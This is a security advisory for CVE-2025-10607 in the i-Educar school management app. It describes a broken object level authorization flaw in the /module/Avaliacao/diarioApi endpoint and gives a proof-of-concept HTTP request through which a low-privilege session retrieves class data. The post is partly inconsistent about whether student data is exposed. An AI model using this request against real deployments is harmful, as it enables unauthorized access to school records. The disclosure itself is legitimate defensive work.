Featured image of post CVE-2025-10607
Broken Access Control Moderate I-Educar Security WebApp BOLA

CVE-2025-10607

Broken Access Control (BOLA)

CVE-2025-10607: Broken Object Level Authorization (BOLA) allows enumeration of classes data via /module/Avaliacao/diarioApi

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10607

Summary

A Broken Object Level Authorization (BOLA) vulnerability was identified in the /module/Avaliacao/diarioApi endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.

Although this vulnerability does not directly expose individual student data, it still constitutes an unauthorized disclosure of academic structure information, which can be leveraged for enumeration or as a stepping stone for further attacks.

Details

Vulnerable Endpoint: GET /module/Avaliacao/diarioApi

The application fails to enforce object-level authorizationwhen handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.

Expected behavior:

  • Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.
  • Unauthorized users should receive 403 Forbidden or an empty response.

Observed behavior:

  • Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.

PoC

  • Authenticate as a non-privileged user (e.g., student, professor).

  • Send the following request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12&busca=S&mostrar_botao_replicar_todos=1&ano=2025&ref_cod_instituicao=1&ref_cod_escola=3&ref_cod_curso=4&ref_cod_serie=6&ref_cod_turma=3&etapa=1&ref_cod_componente_curricular=11&ref_cod_matricula=12&navegacao_tab=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost/module/Avaliacao/diario?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12
Cookie: educar_session=[low-privileged-session]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

  • We could observe that informations about classes were returned.

Impact

This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to:

  • Unauthorized access to sensitive PII;
  • Violation of data protection laws (e.g., LGPD, GDPR);
  • Potential abuse of user data or impersonation;
  • User enumeration.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md

Finder

Marcelo Queiroz

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy